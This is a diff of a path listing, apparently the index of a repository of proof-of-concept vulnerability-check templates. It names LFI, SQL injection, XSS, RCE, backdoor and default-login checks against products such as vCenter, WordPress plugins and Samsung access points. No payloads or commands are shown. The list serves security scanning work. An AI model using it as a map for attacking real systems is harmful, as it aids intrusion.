./poc/local_file_inclusion/jeewms-lfi-1.yaml ./poc/local_file_inclusion/jeewms-lfi-2.yaml ./poc/local_file_inclusion/jeewms-lfi-8252.yaml @@ -48351,22 +48306,21 @@ ./poc/local_file_inclusion/jolokia-unauthenticated-lfi-8364.yaml ./poc/local_file_inclusion/jolokia-unauthenticated-lfi-8365.yaml ./poc/local_file_inclusion/jolokia-unauthenticated-lfi-8366.yaml -./poc/local_file_inclusion/jolokia-unauthenticated-lfi.yaml +./poc/local_file_inclusion/joomla-com-fabrik-lfi-8370.yaml ./poc/local_file_inclusion/joomla-com-fabrik-lfi-8371.yaml ./poc/local_file_inclusion/joomla-com-fabrik-lfi-8372.yaml ./poc/local_file_inclusion/joomla-com-fabrik-lfi-8373.yaml ./poc/local_file_inclusion/joomla-lfi-comfabrik.yaml ./poc/local_file_inclusion/karel-ip-phone-lfi-8436.yaml ./poc/local_file_inclusion/karel-ip-phone-lfi-8437.yaml +./poc/local_file_inclusion/karel-ip-phone-lfi-8438.yaml ./poc/local_file_inclusion/karenderia-cms-lfi.yaml ./poc/local_file_inclusion/kyocera-m2035dn-lfi-8557.yaml ./poc/local_file_inclusion/kyocera-m2035dn-lfi-8558.yaml ./poc/local_file_inclusion/kyocera-m2035dn-lfi-8559.yaml -./poc/local_file_inclusion/kyocera-m2035dn-lfi.yaml ./poc/local_file_inclusion/kyocera-rx-ecosys-m2035dn-lfi.yaml ./poc/local_file_inclusion/lanproxy-cve-2021-3019-lfi.yml ./poc/local_file_inclusion/lanproxy-lfi.yaml -./poc/local_file_inclusion/laravel-filemanager-lfi-8587.yaml ./poc/local_file_inclusion/laravel-filemanager-lfi-8588.yaml ./poc/local_file_inclusion/laravel-filemanager-lfi-8589.yaml ./poc/local_file_inclusion/lfi-00.yaml @@ -48379,7 +48333,6 @@ ./poc/local_file_inclusion/lfi-fuzz.yaml ./poc/local_file_inclusion/lfi-j2ee.yaml ./poc/local_file_inclusion/lfi-keyed.yaml -./poc/local_file_inclusion/lfi-linux-fuzz.yaml ./poc/local_file_inclusion/lfi-linux.yaml ./poc/local_file_inclusion/lfi-vuln-params.yaml ./poc/local_file_inclusion/lfi-windows.yaml @@ -48396,6 +48349,7 @@ ./poc/local_file_inclusion/metinfo-lfi-1.yaml ./poc/local_file_inclusion/metinfo-lfi-2.yaml ./poc/local_file_inclusion/metinfo-lfi-3.yaml +./poc/local_file_inclusion/metinfo-lfi-8838.yaml ./poc/local_file_inclusion/metinfo-lfi-8839.yaml ./poc/local_file_inclusion/metinfo-lfi-8840.yaml ./poc/local_file_inclusion/metinfo-lfi-8841.yaml @@ -48416,23 +48370,19 @@ ./poc/local_file_inclusion/mpsec-lfi-8954.yaml ./poc/local_file_inclusion/mpsec-lfi-8955.yaml ./poc/local_file_inclusion/mpsec-lfi-8956.yaml -./poc/local_file_inclusion/mpsec-lfi-8957.yaml -./poc/local_file_inclusion/mpsec-lfi.yaml ./poc/local_file_inclusion/mthemeunus-lfi-8970.yaml ./poc/local_file_inclusion/mthemeunus-lfi-8971.yaml ./poc/local_file_inclusion/nuxt-js-semi-lfi.yaml ./poc/local_file_inclusion/oliver-library-lfi-9239.yaml ./poc/local_file_inclusion/oliver-library-lfi-9240.yaml ./poc/local_file_inclusion/oliver-library-lfi-9241.yaml -./poc/local_file_inclusion/oliver-library-lfi.yaml ./poc/local_file_inclusion/omnia-mpx-lfi.yaml -./poc/local_file_inclusion/opencti-lfi-9268.yaml -./poc/local_file_inclusion/opencti-lfi.yaml +./poc/local_file_inclusion/opencti-lfi-9267.yaml ./poc/local_file_inclusion/opensis-lfi-1.yaml ./poc/local_file_inclusion/opensis-lfi-2.yaml ./poc/local_file_inclusion/opensis-lfi-9315.yaml +./poc/local_file_inclusion/opensis-lfi-9316.yaml ./poc/local_file_inclusion/opensis-lfi-9317.yaml -./poc/local_file_inclusion/opensis-lfi.yaml ./poc/local_file_inclusion/oracle-ebs-lfi.yaml ./poc/local_file_inclusion/oracle-fatwire-lfi-9378.yaml ./poc/local_file_inclusion/oracle-fatwire-lfi-9379.yaml @@ -48442,39 +48392,44 @@ ./poc/local_file_inclusion/ov3-online-administration-unauthenticated-lfi.yaml ./poc/local_file_inclusion/pacsone-server-6-6-2-lfi.yaml ./poc/local_file_inclusion/pacsone-server-lfi-9428.yaml -./poc/local_file_inclusion/pacsone-server-lfi-9429.yaml ./poc/local_file_inclusion/pacsone-server-lfi-9430.yaml +./poc/local_file_inclusion/pacsone-server-lfi.yaml ./poc/local_file_inclusion/phpwiki-lfi-9564.yaml ./poc/local_file_inclusion/phpwiki-lfi-9565.yaml +./poc/local_file_inclusion/phpwiki-lfi-9566.yaml ./poc/local_file_inclusion/phpwiki-lfi-9567.yaml ./poc/local_file_inclusion/phpwiki-lfi-9568.yaml +./poc/local_file_inclusion/phpwiki-lfi.yaml ./poc/local_file_inclusion/process-maker-lfi.yaml ./poc/local_file_inclusion/processmaker-lfi-9659.yaml -./poc/local_file_inclusion/processmaker-lfi-9660.yaml ./poc/local_file_inclusion/processmaker-lfi-9661.yaml ./poc/local_file_inclusion/processmaker-lfi-9662.yaml ./poc/local_file_inclusion/qihang-media-lfi-9766.yaml ./poc/local_file_inclusion/qihang-media-lfi-9767.yaml ./poc/local_file_inclusion/qihang-media-lfi-9768.yaml -./poc/local_file_inclusion/qihang-media-lfi-9769.yaml +./poc/local_file_inclusion/qihang-media-lfi.yaml ./poc/local_file_inclusion/ruijie-networks-lfi-9938.yaml ./poc/local_file_inclusion/ruijie-networks-lfi-9939.yaml ./poc/local_file_inclusion/ruijie-networks-lfi-9940.yaml ./poc/local_file_inclusion/ruijie-networks-lfi-9941.yaml +./poc/local_file_inclusion/ruijie-networks-lfi-9942.yaml ./poc/local_file_inclusion/ruoyi-management-lfi.yaml +./poc/local_file_inclusion/samsung-wlan-ap-lfi-10000.yaml ./poc/local_file_inclusion/samsung-wlan-ap-lfi-10001.yaml -./poc/local_file_inclusion/samsung-wlan-ap-lfi-10002.yaml ./poc/local_file_inclusion/samsung-wlan-ap-lfi-10003.yaml ./poc/local_file_inclusion/samsung-wlan-ap-lfi-9997.yaml ./poc/local_file_inclusion/samsung-wlan-ap-lfi-9998.yaml ./poc/local_file_inclusion/samsung-wlan-ap-lfi-9999.yaml +./poc/local_file_inclusion/samsung-wlan-ap-lfi.yaml ./poc/local_file_inclusion/schneider-electric-pelco-videoxpert-core-admin-portal-lfi.yaml ./poc/local_file_inclusion/selea-targa-camera-lfi.yaml ./poc/local_file_inclusion/shopxolfi.yaml ./poc/local_file_inclusion/shortcode-lfi-10214.yaml ./poc/local_file_inclusion/shortcode-lfi-10215.yaml ./poc/local_file_inclusion/shortcode-lfi-10216.yaml +./poc/local_file_inclusion/shortcode-lfi.yaml ./poc/local_file_inclusion/simple-image-manipulator-lfi-10281.yaml +./poc/local_file_inclusion/simple-image-manipulator-lfi-10282.yaml ./poc/local_file_inclusion/simple-image-manipulator-lfi-10283.yaml ./poc/local_file_inclusion/simple-image-manipulator-lfi.yaml ./poc/local_file_inclusion/sitecore-lfi.yaml @@ -48482,30 +48437,29 @@ ./poc/local_file_inclusion/sl-studio-lfi-10319.yaml ./poc/local_file_inclusion/sl-studio-lfi-10320.yaml ./poc/local_file_inclusion/sl-studio-lfi-10321.yaml -./poc/local_file_inclusion/sl-studio-lfi.yaml ./poc/local_file_inclusion/sniplets-lfi-10341.yaml ./poc/local_file_inclusion/sniplets-lfi-10342.yaml ./poc/local_file_inclusion/sniplets-lfi-10343.yaml ./poc/local_file_inclusion/sniplets-lfi.yaml ./poc/local_file_inclusion/sofneta-mecdream-pacs-lfi-10350.yaml ./poc/local_file_inclusion/sofneta-mecdream-pacs-lfi-10351.yaml +./poc/local_file_inclusion/sofneta-mecdream-pacs-lfi.yaml ./poc/local_file_inclusion/sofneta-mecdream-pacs-server-lfi.yaml ./poc/local_file_inclusion/squirrelmail-lfi-10516.yaml ./poc/local_file_inclusion/squirrelmail-lfi-10517.yaml -./poc/local_file_inclusion/squirrelmail-lfi-10518.yaml -./poc/local_file_inclusion/squirrelmail-lfi.yaml ./poc/local_file_inclusion/surrealtodo-lfi-10580.yaml ./poc/local_file_inclusion/surrealtodo-lfi.yaml ./poc/local_file_inclusion/targa-camera-lfi-10652.yaml ./poc/local_file_inclusion/targa-camera-lfi-10653.yaml ./poc/local_file_inclusion/targa-camera-lfi-10654.yaml -./poc/local_file_inclusion/targa-camera-lfi-10655.yaml ./poc/local_file_inclusion/thinkcmf-lfi (copy 1).yaml ./poc/local_file_inclusion/thinkcmf-lfi-1.yaml ./poc/local_file_inclusion/thinkcmf-lfi-10721.yaml ./poc/local_file_inclusion/thinkcmf-lfi-10722.yaml +./poc/local_file_inclusion/thinkcmf-lfi-10723.yaml ./poc/local_file_inclusion/thinkcmf-lfi-10724.yaml ./poc/local_file_inclusion/thinkcmf-lfi-2.yaml +./poc/local_file_inclusion/thinkcmf-lfi.yaml ./poc/local_file_inclusion/thinkcmf-lfi.yml ./poc/local_file_inclusion/thinkcmflfi.yaml ./poc/local_file_inclusion/thinkphp6-lang-lfi.yaml @@ -48515,28 +48469,30 @@ ./poc/local_file_inclusion/vmware-vcenter-lfi-1.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-11046.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-11047.yaml -./poc/local_file_inclusion/vmware-vcenter-lfi-11048.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-2.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-3.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-linux-11042.yaml ./poc/local_file_inclusion/vmware-vcenter-lfi-linux-11043.yaml -./poc/local_file_inclusion/vmware-vcenter-lfi-linux-11045.yaml +./poc/local_file_inclusion/vmware-vcenter-lfi-linux-11044.yaml +./poc/local_file_inclusion/vmware-vcenter-lfi-linux.yaml +./poc/local_file_inclusion/vmware-vcenter-lfi.yaml ./poc/local_file_inclusion/windows-lfi-fuzz.yaml ./poc/local_file_inclusion/wordpress-LFI.yaml ./poc/local_file_inclusion/wordpress-ext-adaptive-images-lfi.yaml ./poc/local_file_inclusion/wordpress-ext-adaptive-images-lfi.yml +./poc/local_file_inclusion/wordpress-lfi(1).yaml +./poc/local_file_inclusion/wordpress-lfi.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11346.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11347.yaml -./poc/local_file_inclusion/wordpress-wordfence-lfi-11348.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11349.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11350.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11351.yaml ./poc/local_file_inclusion/wordpress-wordfence-lfi-11352.yaml +./poc/local_file_inclusion/wordpress-wordfence-lfi.yaml ./poc/local_file_inclusion/wp-brandfolder-plugin-lfi.yaml ./poc/local_file_inclusion/wp-church-admin-lfi.yaml ./poc/local_file_inclusion/wp-javospot-lfi-11480.yaml ./poc/local_file_inclusion/wp-javospot-lfi-11481.yaml -./poc/local_file_inclusion/wp-javospot-lfi-11482.yaml ./poc/local_file_inclusion/wp-javospot-premium-theme-lfi.yaml ./poc/local_file_inclusion/wp-localize-post-lfi.yaml ./poc/local_file_inclusion/wp-mail-masta-lfi.yaml @@ -48546,22 +48502,21 @@ ./poc/local_file_inclusion/wp-memphis-documents-library-lfi-11497.yaml ./poc/local_file_inclusion/wp-memphis-documents-library-lfi-11499.yaml ./poc/local_file_inclusion/wp-memphis-documents-library-lfi-2.yaml -./poc/local_file_inclusion/wp-memphis-documents-library-lfi.yaml ./poc/local_file_inclusion/wp-oxygen-theme-lfi-11519.yaml ./poc/local_file_inclusion/wp-oxygen-theme-lfi-11520.yaml ./poc/local_file_inclusion/wp-oxygen-theme-lfi-11521.yaml ./poc/local_file_inclusion/wp-oxygen-theme-lfi-11523.yaml +./poc/local_file_inclusion/wp-oxygen-theme-lfi.yaml ./poc/local_file_inclusion/wp-plugin-ad-widget-lfi.yaml ./poc/local_file_inclusion/wp-plugin-issuu-panel-lfi.yaml ./poc/local_file_inclusion/wp-plugin-memphis-documents-library-lfi.yaml ./poc/local_file_inclusion/wp-plugin-wp-with-spritz-lfi.yaml ./poc/local_file_inclusion/wp-simple-fields-lfi-11566.yaml ./poc/local_file_inclusion/wp-simple-fields-lfi-11567.yaml -./poc/local_file_inclusion/wp-simple-fields-lfi-11568.yaml ./poc/local_file_inclusion/wp-simple-fields-lfi-11569.yaml ./poc/local_file_inclusion/wp-simple-fields-lfi-11570.yaml +./poc/local_file_inclusion/wp-simple-fields-lfi-11571.yaml ./poc/local_file_inclusion/wp-site-editor-lfi.yaml -./poc/local_file_inclusion/wp-socialfit-xss-11577.yaml ./poc/local_file_inclusion/wp-socialfit-xss-11579.yaml ./poc/local_file_inclusion/wp-socialfit-xss-11580.yaml ./poc/local_file_inclusion/wp-socialfit-xss-11581.yaml @@ -48578,9 +48533,8 @@ ./poc/local_file_inclusion/wp-tutor-lfi-11597.yaml ./poc/local_file_inclusion/wp-tutor-lfi-11598.yaml ./poc/local_file_inclusion/wp-tutor-lfi-11599.yaml +./poc/local_file_inclusion/wp-tutor-lfi-11600.yaml ./poc/local_file_inclusion/wp-tutor-lfi-11601.yaml -./poc/local_file_inclusion/wp-tutor-lfi.yaml -./poc/local_file_inclusion/wp-vault-lfi(1).yaml ./poc/local_file_inclusion/wp-vault-lfi-11606.yaml ./poc/local_file_inclusion/wp-vault-lfi-11607.yaml ./poc/local_file_inclusion/wp-vault-lfi-11608.yaml @@ -48590,14 +48544,15 @@ ./poc/local_file_inclusion/wp-vault-lfi-11612.yaml ./poc/local_file_inclusion/wp-wechat-broadcast-lfi.yaml ./poc/local_file_inclusion/xerox-efi-lfi-11681.yaml +./poc/local_file_inclusion/xerox-efi-lfi-11682.yaml ./poc/local_file_inclusion/xerox-efi-lfi-11683.yaml ./poc/local_file_inclusion/xmlrpcservlet_lfi.yaml ./poc/local_file_inclusion/xxe_lfi.yaml ./poc/local_file_inclusion/yisaitong-downloadfromfile-lfi.yaml ./poc/local_file_inclusion/yisaitong-uploadfilemanager-lfi.yaml ./poc/local_file_inclusion/yishaadmin-lfi-11742.yaml +./poc/local_file_inclusion/yishaadmin-lfi-11743.yaml ./poc/local_file_inclusion/yishaadmin-lfi-11744.yaml -./poc/local_file_inclusion/yishaadmin-lfi.yaml ./poc/local_file_inclusion/yonyou-nc-printbill-lfi.yaml ./poc/local_file_inclusion/zendrop-dropshipping-and-fulfillment-2fe6949ea942d8a3b7779bc5ccf17f38.yaml ./poc/local_file_inclusion/zendrop-dropshipping-and-fulfillment-d55b65118444e2b38ff7422e4f9db780.yaml @@ -48610,8 +48565,6 @@ ./poc/magento/magento-2-exposed-api-3.yaml ./poc/magento/magento-2-exposed-api-8687.yaml ./poc/magento/magento-2-exposed-api-8688.yaml -./poc/magento/magento-2-exposed-api-8689.yaml -./poc/magento/magento-admin-panel-8690.yaml ./poc/magento/magento-admin-panel-8691.yaml ./poc/magento/magento-admin-panel-8692.yaml ./poc/magento/magento-admin-panel-8693.yaml @@ -48620,19 +48573,18 @@ ./poc/magento/magento-admin-panel.yaml ./poc/magento/magento-cacheleak-8696.yaml ./poc/magento/magento-cacheleak-8697.yaml +./poc/magento/magento-cacheleak-8698.yaml ./poc/magento/magento-cacheleak-8699.yaml -./poc/magento/magento-cacheleak.yaml ./poc/magento/magento-config-1.yaml ./poc/magento/magento-config-2.yaml ./poc/magento/magento-config-8700.yaml ./poc/magento/magento-config-8701.yaml -./poc/magento/magento-config-8702.yaml ./poc/magento/magento-config-8703.yaml +./poc/magento/magento-config-disclosure.yaml ./poc/magento/magento-config.yaml ./poc/magento/magento-detect-1.yaml ./poc/magento/magento-detect-2.yaml ./poc/magento/magento-detect-8704.yaml -./poc/magento/magento-detect-8705.yaml ./poc/magento/magento-detect-8706.yaml ./poc/magento/magento-detect-8707.yaml ./poc/magento/magento-downloader-panel.yaml @@ -48662,7 +48614,6 @@ ./poc/microsoft/74cms-show-sqli.yaml ./poc/microsoft/74cms-sqli-1.yaml ./poc/microsoft/74cms-sqli-1.yml -./poc/microsoft/74cms-sqli-10.yaml ./poc/microsoft/74cms-sqli-2.yaml ./poc/microsoft/74cms-sqli-2.yml ./poc/microsoft/74cms-sqli-8.yaml @@ -48783,14 +48734,16 @@ ./poc/microsoft/aikcms_v2-poster-editphp-time-blind.yaml ./poc/microsoft/aikcms_v2-xss.yaml ./poc/microsoft/aikcms_v2_notice_edit_sqli.yaml +./poc/microsoft/aims-password-mgmt-client-218.yaml +./poc/microsoft/aims-password-mgmt-client-219.yaml ./poc/microsoft/aims-password-mgmt-client-220.yaml -./poc/microsoft/aims-password-mgmt-client-221.yaml ./poc/microsoft/aims-password-mgmt-client.yaml +./poc/microsoft/aims-password-portal-222.yaml ./poc/microsoft/aims-password-portal-223.yaml -./poc/microsoft/aims-password-portal-224.yaml ./poc/microsoft/aims-password-portal.yaml ./poc/microsoft/alibaba-group-dms.yaml ./poc/microsoft/anecms.yaml +./poc/microsoft/api-buttercms-403.yaml ./poc/microsoft/appcms-databases.yaml ./poc/microsoft/appcms.yaml ./poc/microsoft/arforms-120f4065771d97da59109a537bd16756.yaml @@ -48971,15 +48924,16 @@ ./poc/microsoft/cforms2.yaml ./poc/microsoft/chamilo-lms-sqli-1.yaml ./poc/microsoft/chamilo-lms-sqli-2.yaml -./poc/microsoft/chamilo-lms-sqli-892.yaml +./poc/microsoft/chamilo-lms-sqli-891.yaml +./poc/microsoft/chamilo-lms-sqli.yaml ./poc/microsoft/chamilo-lms-xss-893.yaml ./poc/microsoft/chamilo-lms-xss-894.yaml ./poc/microsoft/chamilo-lms-xss.yaml ./poc/microsoft/chanzhicms.yaml ./poc/microsoft/chronoforms-3c97c9a74c23d051ec22745b993978f5.yaml ./poc/microsoft/chronoforms.yaml +./poc/microsoft/cisco-systems-login-973.yaml ./poc/microsoft/cisco-systems-login-974.yaml -./poc/microsoft/cisco-systems-login-975.yaml ./poc/microsoft/cisco-systems-login.yaml ./poc/microsoft/cluevo-lms-6a1d6ebcef69edeed5f796acb8a5f731.yaml ./poc/microsoft/cluevo-lms-78892043fdf34c1dee70d29718c1a4c1.yaml @@ -49129,10 +49083,10 @@ ./poc/microsoft/dedecms-membergroup-sqli-6798.yaml ./poc/microsoft/dedecms-membergroup-sqli-6799.yaml ./poc/microsoft/dedecms-membergroup-sqli.yml -./poc/microsoft/dedecms-openredirect-6800.yaml ./poc/microsoft/dedecms-openredirect-6801.yaml ./poc/microsoft/dedecms-openredirect-6802.yaml ./poc/microsoft/dedecms-openredirect-6803.yaml +./poc/microsoft/dedecms-openredirect.yaml ./poc/microsoft/dedecms-url-redirection.yaml ./poc/microsoft/dedecms-url-redirection.yml ./poc/microsoft/dedecms-workflow.yaml @@ -49141,7 +49095,6 @@ ./poc/microsoft/default-microsoft-azure-page-6874.yaml ./poc/microsoft/default-microsoft-azure-page-6875.yaml ./poc/microsoft/default-microsoft-azure-page-6876.yaml -./poc/microsoft/default-microsoft-azure-page.yaml ./poc/microsoft/devalcms-xss.yaml ./poc/microsoft/diancms.yaml ./poc/microsoft/dm-albums-45ba464412c6ae4b94e80349ccf8b660.yaml @@ -49161,7 +49114,6 @@ ./poc/microsoft/dotcms-admin-panel.yaml ./poc/microsoft/dotcms-version-detect.yaml ./poc/microsoft/dotnetcms-sqli-7089.yaml -./poc/microsoft/dotnetcms-sqli.yaml ./poc/microsoft/dotnetcms-sqli.yml ./poc/microsoft/drupal_module-comscore_direct-cross-site-scripting.yaml ./poc/microsoft/drupal_module-config_perms-access-bypass.yaml @@ -49170,7 +49122,8 @@ ./poc/microsoft/drupal_module-spamspan-cross-site-scripting.yaml ./poc/microsoft/duomicms-sql-injection-7122.yaml ./poc/microsoft/duomicms-sql-injection-7123.yaml -./poc/microsoft/duomicms-sql-injection-7125.yaml +./poc/microsoft/duomicms-sql-injection-7124.yaml +./poc/microsoft/duomicms-sql-injection.yaml ./poc/microsoft/duomicms-sqli.yaml ./poc/microsoft/duomicms-sqli.yml ./poc/microsoft/duomicms-workflow.yaml @@ -49203,8 +49156,8 @@ ./poc/microsoft/empirecms-xss-7218.yaml ./poc/microsoft/empirecms-xss-7219.yaml ./poc/microsoft/empirecms-xss-7220.yaml -./poc/microsoft/ems-login-panel-7223.yaml ./poc/microsoft/ems-login-panel-7224.yaml +./poc/microsoft/ems-login-panel-7225.yaml ./poc/microsoft/ems-login-panel.yaml ./poc/microsoft/ems-webclient-detect.yaml ./poc/microsoft/ems-webclient-panel.yaml @@ -49225,12 +49178,12 @@ ./poc/microsoft/feifeicms-lfr-7463.yaml ./poc/microsoft/feifeicms-lfr-7464.yaml ./poc/microsoft/feifeicms-lfr-7465.yaml +./poc/microsoft/feifeicms-lfr-7466.yaml ./poc/microsoft/feifeicms-lfr.yml ./poc/microsoft/feifeicms-workflow.yaml ./poc/microsoft/feifeicms.yaml ./poc/microsoft/fidion-cms.yaml ./poc/microsoft/finecms-sqli-7475.yaml -./poc/microsoft/finecms-sqli.yaml ./poc/microsoft/finecms-sqli.yml ./poc/microsoft/finecms.yaml ./poc/microsoft/flip-cms-panel.yaml @@ -49322,6 +49275,7 @@ ./poc/microsoft/getsimple-cms-detect-2.yaml ./poc/microsoft/getsimple-cms-detect-7614.yaml ./poc/microsoft/getsimple-cms-detect-7615.yaml +./poc/microsoft/getsimple-cms-detect.yaml ./poc/microsoft/getsimple-cms-detector-7611.yaml ./poc/microsoft/getsimple-cms-detector-7613.yaml ./poc/microsoft/getsimple-cms-detector.yaml @@ -49488,17 +49442,16 @@ ./poc/microsoft/kevinlab-bems-backdoor-8454.yaml ./poc/microsoft/kevinlab-bems-backdoor-8455.yaml ./poc/microsoft/kevinlab-bems-backdoor-8456.yaml -./poc/microsoft/kevinlab-bems-backdoor.yaml -./poc/microsoft/kevinlab-bems-sqli-8457.yaml ./poc/microsoft/kevinlab-bems-sqli-8458.yaml ./poc/microsoft/kevinlab-bems-sqli-8459.yaml +./poc/microsoft/kevinlab-bems-sqli-8460.yaml +./poc/microsoft/kevinlab-bems-sqli.yaml ./poc/microsoft/kevinlab-hems-backdoor-8463.yaml ./poc/microsoft/kevinlab-hems-backdoor-8464.yaml ./poc/microsoft/kevinlab-hems-backdoor-8465.yaml ./poc/microsoft/kevinlab-hems-backdoor-8466.yaml -./poc/microsoft/kevinlab-hems-backdoor-8467.yaml ./poc/microsoft/kiwitcms-json-rpc.yaml -./poc/microsoft/kiwitcms-login-8496.yaml +./poc/microsoft/kiwitcms-login-8497.yaml ./poc/microsoft/kiwitcms-login.yaml ./poc/microsoft/kordil-edms.yaml ./poc/microsoft/kpcms-socket-login-info-disclosure.yaml @@ -49533,7 +49486,6 @@ ./poc/microsoft/lotuscms-rce-2.yaml ./poc/microsoft/lotuscms-rce-8650.yaml ./poc/microsoft/lotuscms-rce-8651.yaml -./poc/microsoft/lotuscms-rce-8652.yaml ./poc/microsoft/lotuscms-rce-8653.yaml ./poc/microsoft/lws-sms-c00e7e76d8a521ccca85015413c6ff0e.yaml ./poc/microsoft/lws-sms-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -49590,7 +49542,7 @@ ./poc/microsoft/menu-items-visibility-control-c141390b43c3b91c671992707f60ed21.yaml ./poc/microsoft/menu-items-visibility-control.yaml ./poc/microsoft/metatag-cms-8832.yaml -./poc/microsoft/metatag-cms.yaml +./poc/microsoft/metatag-cms-8833.yaml ./poc/microsoft/microsoft-advertising-universal-event-tracking-uet-f6e4d845703be6cb9b81a808ad73176e.yaml ./poc/microsoft/microsoft-advertising-universal-event-tracking-uet.yaml ./poc/microsoft/microsoft-azure-error.yaml @@ -49605,9 +49557,9 @@ ./poc/microsoft/microsoft-exchange-panel-8849.yaml ./poc/microsoft/microsoft-exchange-panel-8850.yaml ./poc/microsoft/microsoft-exchange-panel.yaml +./poc/microsoft/microsoft-exchange-server-detect-8851.yaml ./poc/microsoft/microsoft-exchange-server-detect-8852.yaml ./poc/microsoft/microsoft-exchange-server-detect-8853.yaml -./poc/microsoft/microsoft-exchange-server-detect.yaml ./poc/microsoft/microsoft-exchange-workflow.yaml ./poc/microsoft/microsoft-exchange.yaml ./poc/microsoft/microsoft-ftp-service-detect.yaml @@ -49621,6 +49573,7 @@ ./poc/microsoft/microsoft-teams-phish.yaml ./poc/microsoft/microsoft-teams-webhook-8856.yaml ./poc/microsoft/microsoft-teams-webhook-8857.yaml +./poc/microsoft/microsoft-teams-webhook-8858.yaml ./poc/microsoft/mm-forms-community-9b22852627967262a0033b664f77f26c.yaml ./poc/microsoft/mm-forms-community.yaml ./poc/microsoft/modern-designs-for-gravity-forms-6477bf18cad6c823db485408d49b337b.yaml @@ -49633,6 +49586,7 @@ ./poc/microsoft/ms-adcs-detect.yaml ./poc/microsoft/ms-exchange-server-reflected-xss-8962.yaml ./poc/microsoft/ms-exchange-server-reflected-xss-8963.yaml +./poc/microsoft/ms-exchange-server-reflected-xss-8964.yaml ./poc/microsoft/ms-exchange-server-reflected-xss-8965.yaml ./poc/microsoft/ms-exchange-server-reflected-xss.yaml ./poc/microsoft/ms-exchange-server.yaml @@ -49656,8 +49610,8 @@ ./poc/microsoft/msmc-redirect-after-comment-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/microsoft/msmc-redirect-after-comment-plugin.yaml ./poc/microsoft/msmc-redirect-after-comment.yaml +./poc/microsoft/msmtp-config-8966.yaml ./poc/microsoft/msmtp-config-8967.yaml -./poc/microsoft/msmtp-config.yaml ./poc/microsoft/mspcontrol-login.yaml ./poc/microsoft/mssql-default-logins.yaml ./poc/microsoft/mssql-detect.yaml @@ -49698,7 +49652,6 @@ ./poc/microsoft/myfactory-fms-xss.yaml ./poc/microsoft/myucms-lfr-8983.yaml ./poc/microsoft/myucms-lfr-8984.yaml -./poc/microsoft/myucms-lfr-8985.yaml ./poc/microsoft/myucms-lfr-8986.yaml ./poc/microsoft/myucms-lfr.yml ./poc/microsoft/namaste-lms-119ec46f108a332aca6034c537083044.yaml @@ -49823,14 +49776,15 @@ ./poc/microsoft/normstar-hr.yaml ./poc/microsoft/nucleus-cms.yaml ./poc/microsoft/octobercms-default-login-9192.yaml -./poc/microsoft/octobercms-default-login.yaml +./poc/microsoft/octobercms-default-login-9193.yaml ./poc/microsoft/octobercms-detect-1.yaml ./poc/microsoft/octobercms-detect-2.yaml ./poc/microsoft/octobercms-detect-9194.yaml -./poc/microsoft/octobercms-detect-9195.yaml -./poc/microsoft/octobercms-detect.yaml +./poc/microsoft/octobercms-detect-9196.yaml +./poc/microsoft/odoo-cms-redirect-9199.yaml ./poc/microsoft/odoo-cms-redirect-9200.yaml ./poc/microsoft/odoo-cms-redirect-9201.yaml +./poc/microsoft/odoo-cms-redirect.yaml ./poc/microsoft/official-mailerlite-sign-up-forms-2cfff66bdd973664a4a41739a9cfd162.yaml ./poc/microsoft/official-mailerlite-sign-up-forms-417d17c6d1f9885b1e28c61ded72670d.yaml ./poc/microsoft/official-mailerlite-sign-up-forms-521ff6cfe5c2370a3c60b11e8a14f9a2.yaml @@ -49898,8 +49852,8 @@ ./poc/microsoft/planso-forms-68ddc22980bc843ae8553f744f5fbafe.yaml ./poc/microsoft/planso-forms.yaml ./poc/microsoft/plone-cms-detect-9605.yaml +./poc/microsoft/plone-cms-detect-9606.yaml ./poc/microsoft/plone-cms-detect-9607.yaml -./poc/microsoft/plone-cms-detect-9608.yaml ./poc/microsoft/plone-cms-detect-9609.yaml ./poc/microsoft/plone-cms-detect.yaml ./poc/microsoft/power-cpms.yaml @@ -49924,8 +49878,9 @@ ./poc/microsoft/rce-vuln-params.yaml ./poc/microsoft/reflected-params.yaml ./poc/microsoft/rhymix-cms-detect-9876.yaml -./poc/microsoft/rhymix-cms-detect-9878.yaml +./poc/microsoft/rhymix-cms-detect-9877.yaml ./poc/microsoft/rhymix-cms-detect-9879.yaml +./poc/microsoft/rhymix-cms-detect.yaml ./poc/microsoft/rubygems-key.yaml ./poc/microsoft/ruoyi-cms-unauth.yaml ./poc/microsoft/s-cms.yaml @@ -49943,14 +49898,16 @@ ./poc/microsoft/samsung-wea453e-rce.yml ./poc/microsoft/samsung-wlan-ap-default-credentials-9996.yaml ./poc/microsoft/samsung-wlan-ap-default-credentials.yaml +./poc/microsoft/samsung-wlan-ap-lfi-10000.yaml ./poc/microsoft/samsung-wlan-ap-lfi-10001.yaml -./poc/microsoft/samsung-wlan-ap-lfi-10002.yaml ./poc/microsoft/samsung-wlan-ap-lfi-10003.yaml ./poc/microsoft/samsung-wlan-ap-lfi-9997.yaml ./poc/microsoft/samsung-wlan-ap-lfi-9998.yaml ./poc/microsoft/samsung-wlan-ap-lfi-9999.yaml +./poc/microsoft/samsung-wlan-ap-lfi.yaml ./poc/microsoft/samsung-wlan-ap-rce-10004.yaml ./poc/microsoft/samsung-wlan-ap-rce-10005.yaml +./poc/microsoft/samsung-wlan-ap-rce-10006.yaml ./poc/microsoft/samsung-wlan-ap-rce-10007.yaml ./poc/microsoft/samsung-wlan-ap-rce-10008.yaml ./poc/microsoft/samsung-wlan-ap-rce-10009.yaml @@ -49958,13 +49915,13 @@ ./poc/microsoft/samsung-wlan-ap-wea453e-rce.yaml ./poc/microsoft/samsung-wlan-ap-wea453e-rce.yml ./poc/microsoft/samsung-wlan-ap-workflow-10011.yaml +./poc/microsoft/samsung-wlan-ap-xss-10012.yaml ./poc/microsoft/samsung-wlan-ap-xss-10013.yaml ./poc/microsoft/samsung-wlan-ap-xss-10014.yaml ./poc/microsoft/samsung-wlan-default-login-10015.yaml ./poc/microsoft/samsung-wlan-default-login-10016.yaml 